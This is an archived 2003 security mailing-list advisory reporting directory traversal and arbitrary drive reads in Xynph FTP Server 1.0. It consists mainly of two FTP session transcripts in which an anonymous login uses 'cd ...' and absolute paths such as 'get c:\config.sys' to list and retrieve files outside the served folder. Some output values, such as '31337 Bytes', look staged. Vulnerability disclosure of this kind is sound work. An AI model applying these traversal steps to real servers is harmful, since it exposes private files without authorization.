Vulnerabilties in Xynph FTP Server 1.0

From: Zero-X www.lobnan.de Team (zero-xat_private)
Date: Sat Jan 11 2003 - 06:52:32 PST

  • Next message: Daniel Ahlberg: "GLSA: mod_php php" 

    Vulnerabilties in Xynph FTP Server 1.0


Xynph FTP Server allows Directory Traversal

Example:
#######################################################
Verbindung mit zero-x.
220 Herzlich Willkommen!
<-Xynph FTP-Server->
Benutzer (zero-x:(none)): anonymous
331 Password required for anonymous.
Kennwort: billsucks
230 User anonymous logged in.
Ftp> pwd
257 "C:/Temp/" is current directory.
Ftp> cd ..
501 CWD failed. No permission
Ftp> cd ...
250 CWD command successful. "C:/Temp/.../" is current directory.
Ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw-   1 ftp      ftp            0 Sep 21  2002 .
drw-rw-rw-   1 ftp      ftp            0 Sep 21  2002 ..
drw-rw-rw-   1 ftp      ftp            0 Sep 21  2002 Programme
drw-rw-rw-   1 ftp      ftp            0 Sep 21  2002 command.com
drw-rw-rw-   1 ftp      ftp            0 Sep 21  2002 Autoexec.bat
drw-rw-rw-   1 ftp      ftp            0 Sep 21  2002 config.sys
drw-rw-rw-   1 ftp      ftp            0 Sep 21  2002 Windows
drw-rw-rw-   1 ftp      ftp            0 Sep 21  2002 Cygwin
drw-rw-rw-   1 ftp      ftp            0 Sep 21  2002 Top-Secret
226 File sent ok
Ftp: 31337 Bytes empfangen in 0.00Sekunden 175000.00KB/Sek.
Ftp> get config.sys
200 Port command successful.
150 Opening data connection for config.sys.
226 File sent ok
Ftp: 1337 Bytes empfangen in 0.06Sekunden 2.92KB/Sek.
Ftp>
#######################################################


and you can read all drives.

Example:
#######################################################
Ftp> open zero-x
Verbindung mit zero-x.
220 Herzlich Willkommen!
<-Xynph FTP-Server->
Benutzer (zero-x:(none)): anonymous
331 Password required for anonymous.
Kennwort: billsucks
230 User anonymous logged in.
Ftp> get c:\config.sys
200 Port command successful.
150 Opening data connection for c:\config.sys.
226 File sent ok
Ftp: 1337 Bytes empfangen in 0.00Sekunden 175000.00KB/Sek.
Ftp> dir a:\
200 Port command successful.
150 Opening data connection for directory list.
-rw-rw-rw-   1 ftp      ftp       305113 Dec 15  2002 1.jpg
-rw-rw-rw-   1 ftp      ftp       313497 Dec 15  2002 4.jpg
-rw-rw-rw-   1 ftp      ftp       326046 Dec 15  2002 2.jpg
-rw-rw-rw-   1 ftp      ftp       357910 Dec 15  2002 3.jpg
226 File sent ok
Ftp: 31337 Bytes empfangen in 0.00Sekunden 244000.00KB/Sek.
Ftp>
#######################################################

~~ Zero X, member of www.lobnan.de ~~

Greets to:

www.lobnan.de (my Team)
www.he-crew.de
www.es-crew.de
www.bhc-security.de
www.dcw-group.net
-- 
______________________________________________
http://www.linuxmail.org/
Now with POP3/IMAP access for only US$19.95/yr

Powered by Outblaze

    This archive was generated by hypermail 2b30 : Mon Jan 20 2003 - 23:23:39 PST